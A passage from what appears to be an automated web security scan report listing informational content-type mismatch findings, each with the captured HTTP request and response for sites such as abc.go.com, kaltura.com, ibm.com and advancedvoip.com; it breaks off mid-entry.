28.60. http://site.abc.go.com/_lib/getCountry  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://site.abc.go.com
Path:   /_lib/getCountry

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /_lib/getCountry HTTP/1.1
Host: site.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 17 Sep 2011 00:57:31 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 17 Sep 2011 00:52:33 GMT
Accept-Ranges: bytes
ETag: "809e8715d474cc1:5280"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc06
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 00:57:34 GMT
Content-Length: 3
X-UA-Compatible: IE=EmulateIE7

usa

28.61. http://sr2.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sr2.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=25199332 HTTP/1.1
Host: sr2.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-304.ibm.com/support/operations/us/en/invoicespayments?lnk=mhmy
Cookie: LivePersonID=LP i=546022977410,d=1312768968

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=25199332
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:27d6"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 17291
Date: Fri, 16 Sep 2011 19:57:33 GMT
Connection: close

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

28.62. http://stats.kaltura.com//api_v3/index.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://stats.kaltura.com
Path:   //api_v3/index.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET //api_v3/index.php?service=stats&action=collect&kalsig=a9b4dfa3b9a7d5c7ec9588b88d5c7e5c&event%3AcurrentPoint=0&ignoreNull=1&event%3AentryId=1%5F6mbkzzuu&event%3Aduration=0&event%3ApartnerId=591531&event%3AeventType=2&event%3Aseek=false&event%3AuiconfId=4899061&event%3AeventTimestamp=1316238793563&event%3AclientVer=3%2E0%3Av3%2E5%2E17%2E6&ks=YTk5YWE2N2NiYmM1ZmFkNWIyNTE4OWU3ZjliZjFkZDMwNTRkZDk0ZXw1OTE1MzE7NTkxNTMxOzEzMTYzMDcwNjY7MDsxMzE2MjIwNjY2LjI3NDI7MDt2aWV3Oio7Ow%3D%3D&event%3AsessionId=3DFD40F9%2D5AB1%2D666F%2DAF9E%2D75F250D566D3&event%3Areferrer=http%253A%2F%2Fwww%2Etmz%2Ecom%2F&event%3AisFirstInSession=false&event%3AobjectType=KalturaStatsEvent&clientTag=kdp%3Av3%2E5%2E17%2E6 HTTP/1.1
Host: stats.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 11 Aug 2011 11:14:14 GMT
ETag: "f357c-7-4aa38e59ced80"
X-Me: ny-apache3
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7
Content-Type: text/html; charset=UTF-8
Expires: Sat, 17 Sep 2011 00:52:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 00:52:06 GMT
Connection: close
Vary: Accept-Encoding

Kaltura

28.63. http://thumbnail.newsinc.com/23529280.sf.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://thumbnail.newsinc.com
Path:   /23529280.sf.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /23529280.sf.jpg HTTP/1.1
Host: thumbnail.newsinc.com
Proxy-Connection: keep-alive
Referer: http://assets.newsinc.com/flash/ndn_toppicks_widget.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
x-amz-id-2: FUcZz9Veo1ToyiAzemLwGUuI/55SLU2sUSq1qgukQ7+H5E8u9j/nDedZMx/61VeU
x-amz-request-id: D9CA6EE513DE606C
Date: Sat, 17 Sep 2011 01:02:00 GMT
Last-Modified: Fri, 16 Sep 2011 12:52:27 GMT
ETag: "eefe9364e68fe6abfcae423fb8879781"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 151112
Server: AmazonS3

.PNG
.
...IHDR.......>.....W.......gAMA....B.O.....bKGD.............    pHYs................    vpAg.......>...Tt....IDATx.....$..$.    ..Yu...8\...57|b...JW.....E.......u.DF....*... ._...wwWU...r5.|uG.""V..
...[SNIP]...

28.64. http://thumbnail.newsinc.com/23529394.sf.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://thumbnail.newsinc.com
Path:   /23529394.sf.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /23529394.sf.jpg HTTP/1.1
Host: thumbnail.newsinc.com
Proxy-Connection: keep-alive
Referer: http://assets.newsinc.com/flash/ndn_toppicks_widget.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
x-amz-id-2: le9iwPS+rxNt7S2Xj2AeJYBTr/Q5Alp2A6whtAc6dl8a3Mm97LPvn4yA/STSi3wG
x-amz-request-id: 22E14EDB05F0A07F
Date: Sat, 17 Sep 2011 01:00:16 GMT
Last-Modified: Fri, 16 Sep 2011 19:57:24 GMT
ETag: "e79f82c3e13c0de07c5621746b6c8462"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 287092
Server: AmazonS3

.PNG
.
...IHDR.......>............ cHRM..z%..............u0...`..:....o._.F....bKGD.............    pHYs...&...&..Ns....    vpAg.......>...Tt....IDATx.|.e.\Y.%.Fv.$.Cw.3:..9..Y
1...r&s3gI..`f....d.J......
...[SNIP]...

28.65. http://usenetjunction.com/scripts/track.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://usenetjunction.com
Path:   /scripts/track.php

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /scripts/track.php?accountId=default1&url=H_www.easynews.com%2F%2F&referrer=H_www.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dnntp%2Bserver&getParams=%3Fgclid%3DCJzUx83AoqsCFRdlgwod-2urfQ&anchor=&isInIframe=false&cookies= HTTP/1.1
Host: usenetjunction.com
Proxy-Connection: keep-alive
Referer: http://www.easynews.com/?gclid=CJzUx83AoqsCFRdlgwod-2urfQ
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:28 GMT
Server: Apache/2.2.15
X-Powered-By: PHP/5.2.13-pl0-gentoo
P3P: CP="NOI NID ADMa DEVa PSAa OUR BUS ONL UNI COM STA OTC"
Set-Cookie: PAPVisitorId=abd16110a066614fc7d576400r5Cr6Wx; expires=Mon, 13-Sep-2021 19:31:28 GMT; path=/; domain=.usenetjunction.com
Content-Length: 48
Content-Type: application/x-javascript

setVisitor('abd16110a066614fc7d576400r5Cr6Wx');

28.66. http://www-03.ibm.com/innovation/us/watson/javascripts/pulse.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www-03.ibm.com
Path:   /innovation/us/watson/javascripts/pulse.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /innovation/us/watson/javascripts/pulse.js HTTP/1.1
Host: www-03.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/watson-schematic.html
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; __utma=137873206.1339650129.1316220891.1316220891.1316220891.1; __utmb=137873206.1.10.1316220891; __utmc=137873206; __utmz=137873206.1316220891.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:53:25 GMT
Server: IBM_HTTP_Server/7.0.0.15
Last-Modified: Wed, 02 Mar 2011 21:49:43 GMT
ETag: "8e232c-ce5a-49d86e3fc8bc0"
Accept-Ranges: bytes
Cache-Control: max-age=10
Expires: Fri, 16 Sep 2011 20:21:40 GMT
Content-Type: application/x-javascript
Content-Length: 52826
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Age: 138

...function PulseNamespace()
{
// Compress things a bit more
var d = document;

function $_Resource() { }

$_Resource.$_items = [
"Loading Poll . . .", // 0 en_US
"Cast you
...[SNIP]...

28.67. http://www-146.ibm.com/nfluent/transwidget/tw.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www-146.ibm.com
Path:   /nfluent/transwidget/tw.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /nfluent/transwidget/tw.jsp?app=ibm-esupport.dBlue&from=en_US&sl=1&banner=1&style=minimal&corr=0&cd=.ibm.com&ratefunc=showRateThis HTTP/1.1
Host: www-146.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-01.ibm.com/support/docview.wss?uid=swg27016186
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www-935.ibm.com/services/us/igs/smarterdatacenter.html%3Flnk%3Dmhse; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:59:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/x-javascript;charset=utf-8
Content-Length: 23281


/*
IBM Confidential
RTTS Real Time Language Translation Solution Offering
.. Copyright IBM Corporation 2010. All rights reserved.    
*/
var _tw_savelang_ = true;

function loadRemoteScript(doc, src
...[SNIP]...

28.68. http://www.advancedvoip.com/images/VoIP_white_papers.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advancedvoip.com
Path:   /images/VoIP_white_papers.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/VoIP_white_papers.jpg HTTP/1.1
Host: www.advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1808
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:25:02 GMT
Accept-Ranges: bytes
ETag: "aeb5f419e7b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:35 GMT
Connection: close

GIF87al...w..,....l...................................<v.<w.=w.=x.>y.>z.?|.?}.@.@..C..C..G..G..D..D.!G.!G.%K.%K.*R.*R.)V.)V.,Y.,Y..X..X./]./].2^.2^.1b.1b.3f.3f.5k.5k.9p.9p.;u.;u.?{.?{.C..C..F..F..H..
...[SNIP]...

28.69. http://www.advancedvoip.com/images/VoIP_white_papers_up.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advancedvoip.com
Path:   /images/VoIP_white_papers_up.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/VoIP_white_papers_up.jpg HTTP/1.1
Host: www.advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 2048
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:25:00 GMT
Accept-Ranges: bytes
ETag: "9471d19e7b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:36 GMT
Connection: close

GIF87al...w..,....l....................................*..*..*..+..,    .,
.-
..
.-../..0..2..3..4..5..4..5.!5."7."8.#9.%;.%<.'@.&C.)B.+C.+D.,G..H..L.2N.2O.:Z.:[.8n.8o.9n.:o.:k.;m.<o.8p.9p.9q.9r.:p.:q.;q
...[SNIP]...

28.70. http://www.advancedvoip.com/images/voip_billing_company.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advancedvoip.com
Path:   /images/voip_billing_company.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_company.jpg HTTP/1.1
Host: www.advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1654
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:25 GMT
Accept-Ranges: bytes
ETag: "0f98ee0e6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:35 GMT
Connection: close

GIF87aQ...w..,....Q...................................<v.<w.=w.=x.>y.>z.?|.?}.@.@..C..C..G..G..D..D.!G.!G.%K.%K.*R.*R.)V.)V.,Y.,Y..X..X./]./].2^.2^.1b.1b.3f.3f.5k.5k.9p.9p.;u.;u.?{.?{.C..C..F..F..H..
...[SNIP]...

28.71. http://www.advancedvoip.com/images/voip_billing_company_contact.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advancedvoip.com
Path:   /images/voip_billing_company_contact.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_company_contact.jpg HTTP/1.1
Host: www.advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1565
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:25 GMT
Accept-Ranges: bytes
ETag: "4c348ae0e6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:35 GMT
Connection: close

GIF87aD...w..,....D...................................<v.<w.=w.=x.>y.>z.?|.?}.@.@..C..C..G..G..D..D.!G.!G.%K.%K.*R.*R.)V.)V.,Y.,Y..X..X./]./].2^.2^.1b.1b.3f.3f.5k.5k.9p.9p.;u.;u.?{.?{.C..C..F..F..H..
...[SNIP]...

28.72. http://www.advancedvoip.com/images/voip_billing_company_contact_p.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advancedvoip.com
Path:   /images/voip_billing_company_contact_p.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_company_contact_p.jpg HTTP/1.1
Host: www.advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1773
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:23 GMT
Accept-Ranges: bytes
ETag: "9c83d3dee6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:36 GMT
Connection: close

GIF87aD...w..,....D....................................*..*..*..+..,    .,
.-
..
.-../..0..2..3..4..5..4..5.!5."7."8.#9.%;.%<.'@.&C.)B.+C.+D.,G..H..L.2N.2O.:Z.:[.8n.8o.9n.:o.:k.;m.<o.8p.8q.9p.9q.9r.:p.;q
...[SNIP]...

28.73. http://www.advancedvoip.com/images/voip_billing_company_p.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advancedvoip.com
Path:   /images/voip_billing_company_p.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_company_p.jpg HTTP/1.1
Host: www.advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1859
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:21 GMT
Accept-Ranges: bytes
ETag: "d62917dee6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:36 GMT
Connection: close

GIF87aQ...w..,....Q....................................*..*..*..+..,    .,
.-
..
.-../..0..2..3..4..5..4..5.!5."7."8.#9.%;.%<.'@.&C.)B.+C.+D.,G..H..L.2N.2O.:Z.:[.8n.8o.9n.:o.:k.;m.<o.8p.8q.9p.9q.9r.:p.;q
...[SNIP]...

28.74. http://www.advancedvoip.com/images/voip_billing_enterprise_solution.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advancedvoip.com
Path:   /images/voip_billing_enterprise_solution.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_enterprise_solution.jpg HTTP/1.1
Host: www.advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1659
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:20 GMT
Accept-Ranges: bytes
ETag: "8cf842dde6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:35 GMT
Connection: close

GIF87aQ...w..,....Q...................................<v.<w.=w.=x.>y.>z.?|.?}.@.@..C..C..G..G..D..D.!G.!G.%K.%K.*R.*R.)V.)V.,Y.,Y..X..X./]./].2^.2^.1b.1b.3f.3f.5k.5k.9p.9p.;u.;u.?{.?{.C..C..F..F..H..
...[SNIP]...

28.75. http://www.advancedvoip.com/images/voip_billing_enterprise_solution_p.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advancedvoip.com
Path:   /images/voip_billing_enterprise_solution_p.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_enterprise_solution_p.jpg HTTP/1.1
Host: www.advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1862
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:20 GMT
Accept-Ranges: bytes
ETag: "329640dde6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:36 GMT
Connection: close

GIF87aQ...w..,....Q....................................*..*..*..+..,    .,
.-
..
.-../..0..2..3..4..5..4..5.!5."7."8.#9.%;.%<.'@.&C.)B.+C.+D.,G..H..L.2N.2O.:Z.:[.8n.8o.9n.:o.:k.;m.<o.8p.8q.9p.9q.9r.:p.;q
...[SNIP]...

28.76. http://www.advancedvoip.com/images/voip_billing_products.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advancedvoip.com
Path:   /images/voip_billing_products.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_products.jpg HTTP/1.1
Host: www.advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1623
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:16 GMT
Accept-Ranges: bytes
ETag: "6229cbdae6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:35 GMT
Connection: close

GIF87aM...w..,....M...................................<v.<w.=w.=x.>y.>z.?|.?}.@.@..C..C..G..G..D..D.!G.!G.%K.%K.*R.*R.)V.)V.,Y.,Y..X..X./]./].2^.2^.1b.1b.3f.3f.5k.5k.9p.9p.;u.;u.?{.?{.C..C..F..F..H..
...[SNIP]...

28.77. http://www.advancedvoip.com/images/voip_billing_products_p.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advancedvoip.com
Path:   /images/voip_billing_products_p.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_products_p.jpg HTTP/1.1
Host: www.advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1857
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:14 GMT
Accept-Ranges: bytes
ETag: "dae32dae6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:36 GMT
Connection: close

GIF87aM...w..,....M....................................*..*..*..+..,    .,
.-
..
.-../..0..2..3..4..5..4..5.!5."7."8.#9.%;.%<.'@.&C.)B.+C.+D.,G..H..L.2N.2O.:Z.:[.8n.8o.9n.:o.:k.;m.<o.8p.8q.9p.9q.9r.:p.;q
...[SNIP]...

28.78. http://www.advancedvoip.com/images/voip_billing_provider.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advancedvoip.com
Path:   /images/voip_billing_provider.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_provider.jpg HTTP/1.1
Host: www.advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
